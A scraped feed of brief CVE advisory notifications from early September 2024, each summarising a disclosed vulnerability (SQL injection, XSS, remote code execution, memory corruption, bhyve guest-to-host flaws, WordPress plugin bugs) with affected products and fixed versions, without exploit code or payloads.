🚨 CVE-2024-45287A malicious value of size in a structure of packed libnv can cause an integer overflow, leading to the allocation of a smaller buffer than required for the parsed data.🎖@cveNotify |
|
| 2024-09-05 13:38:39 |
🚨 CVE-2024-34660Heap-based out-of-bounds write in Samsung Notes prior to version 4.4.21.62 allows local attackers to execute arbitrary code.🎖@cveNotify |
|
| 2024-09-05 13:38:38 |
🚨 CVE-2024-7262Improper path validation in promecefpluginhost.exe in Kingsoft WPS Office version ranging from 12.2.0.13110 to 12.2.0.16412 (exclusive) on Windows allows an attacker to load an arbitrary Windows library.The vulnerability was found weaponized as a single-click exploit in the form of a deceptive spreadsheet document🎖@cveNotify |
|
| 2024-09-05 13:38:34 |
🚨 CVE-2024-25722qanything_kernel/connector/database/mysql/mysql_client.py in qanything.ai QAnything before 1.2.0 allows SQL Injection.🎖@cveNotify |
|
| 2024-09-05 13:08:24 |
🚨 CVE-2024-8391In Eclipse Vert.x version 4.3.0 to 4.5.9, the gRPC server does not limit the maximum length of message payload (Maven GAV: io.vertx:vertx-grpc-server and io.vertx:vertx-grpc-client). This is fixed in the 4.5.10 version. Note this does not affect the Vert.x gRPC server based grpc-java and Netty libraries (Maven GAV: io.vertx:vertx-grpc)🎖@cveNotify |
|
| 2024-09-05 13:08:23 |
🚨 CVE-2024-45075IBM webMethods Integration 10.15 could allow an authenticated user to create scheduler tasks that would allow them to escalate their privileges to administrator due to missing authentication.🎖@cveNotify |
|
| 2024-09-05 13:08:18 |
🚨 CVE-2024-45053Fides is an open-source privacy engineering platform. Starting in version 2.19.0 and prior to version 2.44.0, the Email Templating feature uses Jinja2 without proper input sanitization or rendering environment restrictions, allowing for Server-Side Template Injection that grants Remote Code Execution to privileged users. A privileged user refers to an Admin UI user with the default `Owner` or `Contributor` role, who can escalate their access and execute code on the underlying Fides Webserver container where the Jinja template rendering function is executed. The vulnerability has been patched in Fides version `2.44.0`. Users are advised to upgrade to this version or later to secure their systems against this threat. There are no workarounds.🎖@cveNotify |
|
| 2024-09-05 13:08:17 |
🚨 CVE-2024-44859Tenda FH1201 v1.2.0.14 has a stack buffer overflow vulnerability in `formWrlExtraGet`.🎖@cveNotify |
|
| 2024-09-05 13:08:13 |
🚨 CVE-2024-44818Cross Site Scripting vulnerability in ZZCMS v.2023 and before allows a remote attacker to obtain sensitive information via the HTTP_Referer header of the caina.php component.🎖@cveNotify |
|
| 2024-09-05 13:08:12 |
🚨 CVE-2024-44808An issue in Vypor Attack API System v.1.0 allows a remote attacker to execute arbitrary code via the user GET parameter.🎖@cveNotify |
|
| 2024-09-05 13:08:11 |
🚨 CVE-2024-43405Nuclei is a vulnerability scanner powered by YAML based templates. Starting in version 3.0.0 and prior to version 3.3.2, a vulnerability in Nuclei's template signature verification system could allow an attacker to bypass the signature check and possibly execute malicious code via custom code template. The vulnerability is present in the template signature verification process, specifically in the `signer` package. The vulnerability stems from a discrepancy between how the signature verification process and the YAML parser handle newline characters, combined with the way multiple signatures are processed. This allows an attacker to inject malicious content into a template while maintaining a valid signature for the benign part of the template. CLI users are affected if they execute custom code templates from unverified sources. This includes templates authored by third parties or obtained from unverified repositories. SDK Users are affected if they are developers integrating Nuclei into their platforms, particularly if they permit the execution of custom code templates by end-users. The vulnerability is addressed in Nuclei v3.3.2. Users are strongly recommended to update to this version to mitigate the security risk. As an interim measure, users should refrain from using custom templates if unable to upgrade immediately. Only trusted, verified templates should be executed. Those who are unable to upgrade Nuclei should disable running custom code templates as a workaround.🎖@cveNotify |
|
| 2024-09-05 13:08:08 |
🚨 CVE-2024-43402Rust is a programming language. The fix for CVE-2024-24576, where `std::process::Command` incorrectly escaped arguments when invoking batch files on Windows, was incomplete. Prior to Rust version 1.81.0, it was possible to bypass the fix when the batch file name had trailing whitespace or periods (which are ignored and stripped by Windows). To determine whether to apply the `cmd.exe` escaping rules, the original fix for the vulnerability checked whether the command name ended with `.bat` or `.cmd`. At the time that seemed enough, as we refuse to invoke batch scripts with no file extension. Windows removes trailing whitespace and periods when parsing file paths. For example, `.bat. .` is interpreted by Windows as `.bat`, but the original fix didn't check for that. Affected users who are using Rust 1.77.2 or greater can remove the trailing whitespace (ASCII 0x20) and trailing periods (ASCII 0x2E) from the batch file name to bypass the incomplete fix and enable the mitigations. Users are affected if their code or one of their dependencies invoke a batch script on Windows with trailing whitespace or trailing periods in the name, and pass untrusted arguments to it. Rust 1.81.0 will update the standard library to apply the CVE-2024-24576 mitigations to all batch files invocations, regardless of the trailing chars in the file name.🎖@cveNotify |
|
| 2024-09-05 13:08:07 |
🚨 CVE-2024-24216Zentao v18.0 to v18.10 was discovered to contain a remote code execution (RCE) vulnerability via the checkConnection method of /app/zentao/module/repo/model.php.🎖@cveNotify |
|
| 2024-09-05 13:08:06 |
🚨 CVE-2024-24091Yealink Meeting Server before v26.0.0.66 was discovered to contain an OS command injection vulnerability via the file upload interface.🎖@cveNotify |
|
| 2024-09-05 11:37:37 |
🚨 CVE-2024-7381The Geo Controller plugin for WordPress is vulnerable to unauthorized shortcode execution due to missing authorization and capability checks on the ajax__shortcode_cache function in all versions up to, and including, 8.6.9. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes available on the target site.🎖@cveNotify |
|
| 2024-09-05 11:37:33 |
🚨 CVE-2024-5957This vulnerability allows unauthenticated remote attackers to bypass authentication and gain APIs access of the Manager.🎖@cveNotify |
|
| 2024-09-05 11:37:32 |
🚨 CVE-2022-3556The Cab fare calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the vehicle title setting in versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrative privileges to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-09-05 10:37:31 |
🚨 CVE-2024-6894The RD Station plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.3.2 due to insufficient input sanitization and output escaping of post metaboxes added by the plugin. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-09-05 10:37:30 |
🚨 CVE-2024-6332The Booking for Appointments and Events Calendar – Amelia Premium and Lite plugins for WordPress are vulnerable to unauthorized access of data due to a missing capability check on the 'ameliaButtonCommand' function in all versions up to, and including, Premium 7.7 and Lite 1.2.3. This makes it possible for unauthenticated attackers to access employee calendar details, including Google Calendar OAuth tokens in the premium version.🎖@cveNotify |
|
| 2024-09-05 09:37:54 |
🚨 CVE-2024-5309The Form Vibes – Database Manager for Forms plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the fv_export_csv, reset_settings, save_settings, save_columns_settings, get_analytics_data, get_event_logs_data, delete_submissions, and get_submissions functions in all versions up to, and including, 1.4.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform multiple unauthorized actions. NOTE: This vulnerability is partially fixed in version 1.4.12.🎖@cveNotify |
|
| 2024-09-05 09:37:53 |
🚨 CVE-2024-4872The product does not validate any query towards persistentdata, resulting in a risk of injection attacks.🎖@cveNotify |
|
| 2024-09-05 07:37:24 |
🚨 CVE-2024-6835The Ivory Search – WordPress Search Plugin plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 5.5.6 via the ajax_load_posts function. This makes it possible for unauthenticated attackers to extract text data from password-protected posts using the boolean-based attack on the AJAX search form🎖@cveNotify |
|
| 2024-09-05 06:37:25 |
🚨 CVE-2024-6846The Chatbot with ChatGPT WordPress plugin before 2.4.5 does not validate access on some REST routes, allowing for an unauthenticated user to purge error and chat logs🎖@cveNotify |
|
| 2024-09-05 06:37:24 |
🚨 CVE-2022-33324Improper Resource Shutdown or Release vulnerability in Mitsubishi Electric Corporation MELSEC iQ-R Series R00/01/02CPU Firmware versions "32" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R04/08/16/32/120(EN)CPU Firmware versions "65" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R08/16/32/120SFCPU Firmware versions "29" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R08/16/32/120PSFCPU Firmware versions "08" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R12CCPU-V Firmware versions "17" and prior, Mitsubishi Electric Corporation MELSEC iQ-L Series L04/08/16/32HCPU Firmware versions "05" and prior and Mitsubishi Electric Corporation MELIPC Series MI5122-VW Firmware versions "07" and prior allows a remote unauthenticated attacker to cause a Denial of Service condition in Ethernet communication on the module by sending specially crafted packets. A system reset of the module is required for recovery.🎖@cveNotify |
|
| 2024-09-05 05:37:32 |
🚨 CVE-2024-8178The ctl_write_buffer and ctl_read_buffer functions allocated memory to be returned to userspace, without initializing it.Malicious software running in a guest VM that exposes virtio_scsi can exploit the vulnerabilities to achieve code execution on the host in the bhyve userspace process, which typically runs as root. Note that bhyve runs in a Capsicum sandbox, so malicious code is constrained by the capabilities available to the bhyve process. A malicious iSCSI initiator could achieve remote code execution on the iSCSI target host.🎖@cveNotify |
|
| 2024-09-05 05:37:26 |
🚨 CVE-2024-45063The function ctl_write_buffer incorrectly set a flag which resulted in a kernel Use-After-Free when a command finished processing.Malicious software running in a guest VM that exposes virtio_scsi can exploit the vulnerabilities to achieve code execution on the host in the bhyve userspace process, which typically runs as root. Note that bhyve runs in a Capsicum sandbox, so malicious code is constrained by the capabilities available to the bhyve process. A malicious iSCSI initiator could achieve remote code execution on the iSCSI target host.🎖@cveNotify |
|
| 2024-09-05 05:37:25 |
🚨 CVE-2024-42416The ctl_report_supported_opcodes function did not sufficiently validate a field provided by userspace, allowing an arbitrary write to a limited amount of kernel help memory.Malicious software running in a guest VM that exposes virtio_scsi can exploit the vulnerabilities to achieve code execution on the host in the bhyve userspace process, which typically runs as root. Note that bhyve runs in a Capsicum sandbox, so malicious code is constrained by the capabilities available to the bhyve process. A malicious iSCSI initiator could achieve remote code execution on the iSCSI target host.🎖@cveNotify |
|
| 2024-09-05 05:37:24 |
🚨 CVE-2024-32668An insufficient boundary validation in the USB code could lead to an out-of-bounds write on the heap, with data controlled by the caller.A malicious, privileged software running in a guest VM can exploit the vulnerability to achieve code execution on the host in the bhyve userspace process, which typically runs as root. Note that bhyve runs in a Capsicum sandbox, so malicious code is constrained by the capabilities available to the bhyve process.🎖@cveNotify |
|
| 2024-09-05 04:37:25 |
🚨 CVE-2024-45287A malicious value of size in a structure of packed libnv can cause an integer overflow, leading to the allocation of a smaller buffer than required for the parsed data.🎖@cveNotify |
|
| 2024-09-05 04:37:24 |
🚨 CVE-2024-41928Malicious software running in a guest VM can exploit the buffer overflow to achieve code execution on the host in the bhyve userspace process, which typically runs as root. Note that bhyve runs in a Capsicum sandbox, so malicious code is constrained by the capabilities available to the bhyve process.🎖@cveNotify |
|
| 2024-09-05 03:37:24 |
🚨 CVE-2024-7627The Bit File Manager plugin for WordPress is vulnerable to Remote Code Execution in versions 6.0 to 6.5.5 via the 'checkSyntax' function. This is due to writing a temporary file to a publicly accessible directory before performing file validation. This makes it possible for unauthenticated attackers to execute code on the server if an administrator has allowed Guest User read permissions.🎖@cveNotify |
|
| 2024-09-04 23:37:25 |
🚨 CVE-2024-8088There is a HIGH severity vulnerability affecting the CPython "zipfile"module affecting "zipfile.Path". Note that the more common API "zipfile.ZipFile" class is unaffected.When iterating over names of entries in a zip archive (for example, methodsof "zipfile.Path" like "namelist()", "iterdir()", etc)the process can be put into an infinite loop with a maliciously craftedzip archive. This defect applies when reading only metadata or extractingthe contents of the zip archive. Programs that are not handlinguser-controlled zip archives are not affected.🎖@cveNotify |
|
| 2024-09-04 23:37:24 |
🚨 CVE-2024-7006A null pointer dereference flaw was found in Libtiff via `tif_dirinfo.c`. This issue may allow an attacker to trigger memory allocation failures through certain means, such as restricting the heap space size or injecting faults, causing a segmentation fault. This can cause an application crash, eventually leading to a denial of service.🎖@cveNotify |
|
| 2024-09-04 22:37:25 |
🚨 CVE-2024-20506A vulnerability in the ClamD service module of Clam AntiVirus (ClamAV) versions 1.4.0, 1.3.2 and prior versions, all 1.2.x versions, 1.0.6 and prior versions, all 0.105.x versions, all 0.104.x versions, and 0.103.11 and all prior versions could allow an authenticated, local attacker to corrupt critical system files.The vulnerability is due to allowing the ClamD process to write to its log file while privileged without checking if the logfile has been replaced with a symbolic link. An attacker could exploit this vulnerability if they replace the ClamD log file with a symlink to a critical system file and then find a way to restart the ClamD process. An exploit could allow the attacker to corrupt a critical system file by appending ClamD log messages after restart.🎖@cveNotify |
|
| 2024-09-04 22:37:24 |
🚨 CVE-2024-20505A vulnerability in the PDF parsing module of Clam AntiVirus (ClamAV) versions 1.4.0, 1.3.2 and prior versions, all 1.2.x versions, 1.0.6 and prior versions, all 0.105.x versions, all 0.104.x versions, and 0.103.11 and all prior versions could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.The vulnerability is due to an out of bounds read. An attacker could exploit this vulnerability by submitting a crafted PDF file to be scanned by ClamAV on an affected device. An exploit could allow the attacker to terminate the scanning process.🎖@cveNotify |
|
| 2024-09-04 22:07:26 |
🚨 CVE-2024-42436Buffer overflow in some Zoom Workplace Apps, SDKs, Rooms Clients, and Rooms Controllers may allow an authenticated user to conduct a denial of service via network access.🎖@cveNotify |
|
| 2024-09-04 22:07:25 |
🚨 CVE-2024-43359ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder has a cross-site scripting vulnerability in the montagereview via the displayinterval, speed, and scale parameters. This vulnerability is fixed in 1.36.34 and 1.37.61.🎖@cveNotify |
|
| 2024-09-04 22:07:24 |
🚨 CVE-2024-43358ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder has a cross-site scripting vulnerability in the filter view via the filter[Id]. This vulnerability is fixed in 1.36.34 and 1.37.61.🎖@cveNotify |
|
| 2024-09-04 21:37:32 |
🚨 CVE-2024-39822Sensitive information exposure in some Zoom Workplace Apps, SDKs, Rooms Clients, and Rooms Controllers may allow an authenticated user to conduct an information disclosure via network access.🎖@cveNotify |
|
| 2024-09-04 21:37:26 |
🚨 CVE-2024-6923There is a MEDIUM severity vulnerability affecting CPython.The email module didn’t properly quote newlines for email headers when serializing an email message allowing for header injection when an email is serialized.🎖@cveNotify |
|
| 2024-09-04 21:37:25 |
🚨 CVE-2023-25983Improper Neutralization of Formula Elements in a CSV File vulnerability in WPOmnia KB Support.This issue affects KB Support: from n/a through 1.5.84.🎖@cveNotify |
|
| 2024-09-04 21:37:24 |
🚨 CVE-2022-47442Improper Neutralization of Formula Elements in a CSV File vulnerability in AyeCode Ltd UsersWP.This issue affects UsersWP: from n/a through 1.2.3.9.🎖@cveNotify |
|
| 2024-09-04 20:37:39 |
🚨 CVE-2023-46767Out-of-bounds write vulnerability in the kernel driver module. Successful exploitation of this vulnerability may cause process exceptions.🎖@cveNotify |
|
| 2024-09-04 20:37:32 |
🚨 CVE-2023-46765Vulnerability of uncaught exceptions in the NFC module. Successful exploitation of this vulnerability can affect NFC availability.🎖@cveNotify |
|
| 2024-09-04 20:37:31 |
🚨 CVE-2023-39913Deserialization of Untrusted Data, Improper Input Validation vulnerability in Apache UIMA Java SDK, Apache UIMA Java SDK, Apache UIMA Java SDK, Apache UIMA Java SDK.This issue affects Apache UIMA Java SDK: before 3.5.0.Users are recommended to upgrade to version 3.5.0, which fixes the issue.There are several locations in the code where serialized Java objects are deserialized without verifying the data. This affects in particular: * the deserialization of a Java-serialized CAS, but also other binary CAS formats that include TSI information using the CasIOUtils class; * the CAS Editor Eclipse plugin which uses the the CasIOUtils class to load data; * the deserialization of a Java-serialized CAS of the Vinci Analysis Engine service which can receive using Java-serialized CAS objects over network connections; * the CasAnnotationViewerApplet and the CasTreeViewerApplet; * the checkpointing feature of the CPE module.Note that the UIMA framework by default does not start any remotely accessible services (i.e. Vinci) that would be vulnerable to this issue. A user or developer would need to make an active choice to start such a service. However, users or developers may use the CasIOUtils in their own applications and services to parse serialized CAS data. They are affected by this issue unless they ensure that the data passed to CasIOUtils is not a serialized Java object.When using Vinci or using CasIOUtils in own services/applications, the unrestricted deserialization of Java-serialized CAS files may allow arbitrary (remote) code execution.As a remedy, it is possible to set up a global or context-specific ObjectInputFilter (cf. https://openjdk.org/jeps/290 and https://openjdk.org/jeps/415 ) if running UIMA on a Java version that supports it. Note that Java 1.8 does not support the ObjectInputFilter, so there is no remedy when running on this out-of-support platform. An upgrade to a recent Java version is strongly recommended if you need to secure an UIMA version that is affected by this issue.To mitigate the issue on a Java 9+ platform, you can configure a filter pattern through the "jdk.serialFilter" system property using a semicolon as a separator:To allow deserializing Java-serialized binary CASes, add the classes: * org.apache.uima.cas.impl.CASCompleteSerializer * org.apache.uima.cas.impl.CASMgrSerializer * org.apache.uima.cas.impl.CASSerializer * java.lang.StringTo allow deserializing CPE Checkpoint data, add the following classes (and any custom classes your application uses to store its checkpoints): * org.apache.uima.collection.impl.cpm.CheckpointData * org.apache.uima.util.ProcessTrace * org.apache.uima.util.impl.ProcessTrace_impl * org.apache.uima.collection.base_cpm.SynchPointMake sure to use "!*" as the final component to the filter pattern to disallow deserialization of any classes not listed in the pattern.Apache UIMA 3.5.0 uses tightly scoped ObjectInputFilters when reading Java-serialized data depending on the type of data being expected. Configuring a global filter is not necessary with this version.🎖@cveNotify |
|
| 2024-09-04 20:37:26 |
🚨 CVE-2023-23796Improper Neutralization of Formula Elements in a CSV File vulnerability in Muneeb Form Builder | Create Responsive Contact Forms.This issue affects Form Builder | Create Responsive Contact Forms: from n/a through 1.9.9.0.🎖@cveNotify |
|
| 2024-09-04 20:37:25 |
🚨 CVE-2022-43555Ivanti Avalanche Printer Device Service Missing Authentication Local Privilege Escalation Vulnerability🎖@cveNotify |
|
| 2024-09-04 19:07:26 |
🚨 CVE-2022-48868In the Linux kernel, the following vulnerability has been resolved:dmaengine: idxd: Let probe fail when workqueue cannot be enabledThe workqueue is enabled when the appropriate driver is loaded anddisabled when the driver is removed. When the driver is removed itassumes that the workqueue was enabled successfully and proceeds tofree allocations made during workqueue enabling.Failure during workqueue enabling does not prevent the driver frombeing loaded. This is because the error path within drv_enable_wq()returns success unless a second failure is encounteredduring the error path. By returning success it is possible to loadthe driver even if the workqueue cannot be enabled andallocations that do not exist are attempted to be freed duringdriver remove.Some examples of problematic flows:(a) idxd_dmaengine_drv_probe() -> drv_enable_wq() -> idxd_wq_request_irq(): In above flow, if idxd_wq_request_irq() fails then idxd_wq_unmap_portal() is called on error exit path, but drv_enable_wq() returns 0 because idxd_wq_disable() succeeds. The driver is thus loaded successfully. idxd_dmaengine_drv_remove()->drv_disable_wq()->idxd_wq_unmap_portal() Above flow on driver unload triggers the WARN in devm_iounmap() because the device resource has already been removed during error path of drv_enable_wq().(b) idxd_dmaengine_drv_probe() -> drv_enable_wq() -> idxd_wq_request_irq(): In above flow, if idxd_wq_request_irq() fails then idxd_wq_init_percpu_ref() is never called to initialize the percpu counter, yet the driver loads successfully because drv_enable_wq() returns 0. idxd_dmaengine_drv_remove()->__idxd_wq_quiesce()->percpu_ref_kill(): Above flow on driver unload triggers a BUG when attempting to drop the initial ref of the uninitialized percpu ref: BUG: kernel NULL pointer dereference, address: 0000000000000010Fix the drv_enable_wq() error path by returning the original error thatindicates failure of workqueue enabling. This ensures that the probefails when an error is encountered and the driver remove paths are onlyattempted when the workqueue was enabled successfully.🎖@cveNotify |
|
| 2024-09-04 19:07:25 |
🚨 CVE-2024-7926A vulnerability classified as critical has been found in ZZCMS 2023. Affected is an unknown function of the file /admin/about_edit.php?action=modify. The manipulation of the argument skin leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-04 18:37:26 |
🚨 CVE-2024-29864Distrobox before 1.7.0.1 allows attackers to execute arbitrary code via command injection into exported executables.🎖@cveNotify |
|
| 2024-09-04 18:37:25 |
🚨 CVE-2019-25210An issue was discovered in Cloud Native Computing Foundation (CNCF) Helm through 3.13.3. It displays values of secrets when the --dry-run flag is used. This is a security concern in some use cases, such as a --dry-run call by a CI/CD tool. NOTE: the vendor's position is that this behavior was introduced intentionally, and cannot be removed without breaking backwards compatibility (some users may be relying on these values). Also, it is not the Helm Project's responsibility if a user decides to use --dry-run within a CI/CD environment whose output is visible to unauthorized persons.🎖@cveNotify |
|
| 2024-09-04 18:37:24 |
🚨 CVE-2023-50975The TD Bank TD Advanced Dashboard client through 3.0.3 for macOS allows arbitrary code execution because of the lack of electron::fuses::IsRunAsNodeEnabled (i.e., ELECTRON_RUN_AS_NODE can be used in production). This makes it easier for a compromised process to access banking information.🎖@cveNotify |
|
| 2024-09-04 18:07:28 |
🚨 CVE-2018-19277securityScan() in PHPOffice PhpSpreadsheet through 1.5.0 allows a bypass of protection mechanisms for XXE via UTF-7 encoding in a .xlsx file🎖@cveNotify |
|
| 2024-09-04 17:37:26 |
🚨 CVE-2024-27619Dlink Dir-3040us A1 1.20b03a hotfix is vulnerable to Buffer Overflow. Any user having read/write access to ftp server can write directly to ram causing buffer overflow if file or files uploaded are greater than available ram. Ftp server allows change of directory to root which is one level up than root of usb flash directory. During upload ram is getting filled and causing system resource exhaustion (no free memory) which causes system to crash and reboot.🎖@cveNotify |
|
| 2024-09-04 17:37:25 |
🚨 CVE-2024-28093**UNSUPPORTED WHEN ASSIGNED** The TELNET service of AdTran NetVanta 3120 18.01.01.00.E devices is enabled by default, and has default credentials for a root-level account.🎖@cveNotify |
|
| 2024-09-04 16:37:43 |
🚨 CVE-2024-41370Organizr v1.90 was discovered to contain a SQL injection vulnerability via chat/setlike.php.🎖@cveNotify |
|
| 2024-09-04 16:37:37 |
🚨 CVE-2024-41369RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWifi.php🎖@cveNotify |
|
| 2024-09-04 16:37:36 |
🚨 CVE-2024-41366RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\userScripts.php🎖@cveNotify |
|
| 2024-09-04 16:37:35 |
🚨 CVE-2024-41364RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\trackEdit.php🎖@cveNotify |
|
| 2024-09-04 16:37:32 |
🚨 CVE-2024-41361RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\manageFilesFolders.php🎖@cveNotify |
|
| 2024-09-04 16:37:31 |
🚨 CVE-2024-30806An issue was discovered in Bento4 v1.6.0-641-2-g1529b83. There is a heap overflow in AP4_Dec3Atom::AP4_Dec3Atom at Ap4Dec3Atom.cpp, leading to a Denial of Service (DoS), as demonstrated by mp42aac.🎖@cveNotify |
|
| 2024-09-04 16:37:30 |
🚨 CVE-2024-29433A deserialization vulnerability in the FASTJSON component of Alldata v0.4.6 allows attackers to execute arbitrary commands via supplying crafted data.🎖@cveNotify |
|
| 2024-09-04 16:37:26 |
🚨 CVE-2023-6140The Essential Real Estate WordPress plugin before 4.4.0 does not prevent users with limited privileges on the site, like subscribers, from momentarily uploading malicious PHP files disguised as ZIP archives, which may lead to remote code execution.🎖@cveNotify |
|
| 2024-09-04 16:37:25 |
🚨 CVE-2023-0392The LDAP Agent Update service with versions prior to 5.18 used an unquoted path, which could allow arbitrary code execution.🎖@cveNotify |
|
| 2024-09-04 16:07:51 |
🚨 CVE-2024-41351bjyadmin commit a560fd5 is vulnerable to Cross Site Scripting (XSS) via Public/statics/umeditor1_2_3/php/getContent.php🎖@cveNotify |
|
| 2024-09-04 16:07:47 |
🚨 CVE-2024-41348openflights commit 5234b5b is vulnerable to Cross-Site Scripting (XSS) via php/alsearch.php🎖@cveNotify |
|
| 2024-09-04 16:07:46 |
🚨 CVE-2024-41346openflights commit 5234b5b is vulnerable to Cross-Site Scripting (XSS) via php/submit.php🎖@cveNotify |
|
| 2024-09-04 16:07:45 |
🚨 CVE-2024-43965Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Smackcoders SendGrid for WordPress allows SQL Injection.This issue affects SendGrid for WordPress: from n/a through 1.4.🎖@cveNotify |
|
| 2024-09-04 15:37:31 |
🚨 CVE-2023-46363jbig2enc v0.28 was discovered to contain a SEGV via jbig2_add_page in src/jbig2enc.cc:512.🎖@cveNotify |
|
| 2024-09-04 15:37:30 |
🚨 CVE-2023-46759Permission control vulnerability in the call module. Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-09-04 15:37:26 |
🚨 CVE-2023-46757The remote PIN module has a vulnerability that causes incorrect information storage locations.Successful exploitation of this vulnerability may affect confidentiality.🎖@cveNotify |
|
| 2024-09-04 15:37:25 |
🚨 CVE-2023-46763Vulnerability of background app permission management in the framework module. Successful exploitation of this vulnerability may cause background apps to start maliciously.🎖@cveNotify |
|
| 2024-09-04 15:08:15 |
🚨 CVE-2024-44920A cross-site scripting (XSS) vulnerability in the component admin_collect_news.php of SeaCMS v12.9 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the siteurl parameter.🎖@cveNotify |
|
| 2024-09-04 15:08:14 |
🚨 CVE-2024-8380A vulnerability was found in SourceCodester Contact Manager with Export to VCF 1.0. It has been rated as critical. This issue affects some unknown processing of the file /endpoint/delete-account.php of the component Delete Contact Handler. The manipulation of the argument contact leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-04 15:08:09 |
🚨 CVE-2024-7938A stored Cross-site Scripting (XSS) vulnerability affecting 3DDashboard in 3DSwymer from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2024x allows an attacker to execute arbitrary script code in user's browser session.🎖@cveNotify |
|
| 2024-09-04 15:08:08 |
🚨 CVE-2024-38858Improper neutralization of input in Checkmk before version 2.3.0p14 allows attackers to inject and run malicious scripts in the Robotmk logs view.🎖@cveNotify |
|
| 2024-09-04 14:07:25 |
🚨 CVE-2024-43920Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Jegstudio Gutenverse allows Stored XSS.This issue affects Gutenverse: from n/a through 1.9.4.🎖@cveNotify |
|
| 2024-09-04 14:07:24 |
🚨 CVE-2024-43941Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Propovoice Propovoice Pro allows SQL Injection.This issue affects Propovoice Pro: from n/a through 1.7.0.3.🎖@cveNotify |
|
| 2024-09-04 13:37:29 |
🚨 CVE-2024-7834A local privilege escalation is caused by Overwolfloading and executing certain dynamic link library files from a user-writeablefolder in SYSTEM context on launch. This allows an attacker with unprivilegedaccess to the system to run arbitrary code with SYSTEM privileges by placing amalicious .dll file in the respective location.🎖@cveNotify |
|
| 2024-09-04 13:37:28 |
🚨 CVE-2024-44383WAYOS FBM-291W v19.09.11 is vulnerable to Command Execution via msp_info_htm.🎖@cveNotify |
|
| 2024-09-04 13:07:37 |
🚨 CVE-2024-4629A vulnerability was found in Keycloak. This flaw allows attackers to bypass brute force protection by exploiting the timing of login attempts. By initiating multiple login requests simultaneously, attackers can exceed the configured limits for failed attempts before the system locks them out. This timing loophole enables attackers to make more guesses at passwords than intended, potentially compromising account security on affected systems.🎖@cveNotify |
|
| 2024-09-04 13:07:36 |
🚨 CVE-2024-45391Tina is an open-source content management system (CMS). Sites building with Tina CMS's command line interface (CLI) prior to version 1.6.2 that use a search token may be vulnerable to the search token being leaked via lock file (tina-lock.json). Administrators of Tina-enabled websites with search setup should rotate their key immediately. This issue has been patched in @tinacms/cli version 1.6.2. Upgrading and rotating the search token is required for the proper fix.🎖@cveNotify |
|
| 2024-09-04 13:07:33 |
🚨 CVE-2024-45390@blakeembrey/template is a string template library. Prior to version 1.2.0, it is possible to inject and run code within the template if the attacker has access to write the template name. Version 1.2.0 contains a patch. As a workaround, don't pass untrusted input as the template display name, or don't use the display name feature.🎖@cveNotify |
|
| 2024-09-04 13:07:32 |
🚨 CVE-2024-45180SquaredUp DS for SCOM 6.2.1.11104 allows XSS.🎖@cveNotify |
|
| 2024-09-04 13:07:31 |
🚨 CVE-2024-44930Serilog before v2.1.0 was discovered to contain a Client IP Spoofing vulnerability, which allows attackers to falsify their IP addresses by specifying an arbitrary IP as a value of X-Forwarded-For or Client-Ip headers while performing HTTP requests.🎖@cveNotify |
|
| 2024-09-04 12:07:25 |
🚨 CVE-2024-45269WordPress plugin "Carousel Slider" provided by Sayful Islam contains a cross-site request forgery vulnerability on Carousel image selection feature. While logged in to the WordPress site with Carousel Slider plugin enabled, accessing a crafted page may cause a user to alter the contents of the WordPress site.🎖@cveNotify |
|
| 2024-09-04 11:37:24 |
🚨 CVE-2024-0874A flaw was found in coredns. This issue could lead to invalid cache entries returning due to incorrectly implemented caching.🎖@cveNotify |
|
| 2024-09-04 09:37:25 |
🚨 CVE-2024-45507Server-Side Request Forgery (SSRF), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.16.Users are recommended to upgrade to version 18.12.16, which fixes the issue.🎖@cveNotify |
|
| 2024-09-04 09:37:24 |
🚨 CVE-2024-45195Direct Request ('Forced Browsing') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.16.Users are recommended to upgrade to version 18.12.16, which fixes the issue.🎖@cveNotify |
|
| 2024-09-04 08:37:24 |
🚨 CVE-2024-8318The Attributes for Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘attributesForBlocks’ parameter in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-09-04 07:37:30 |
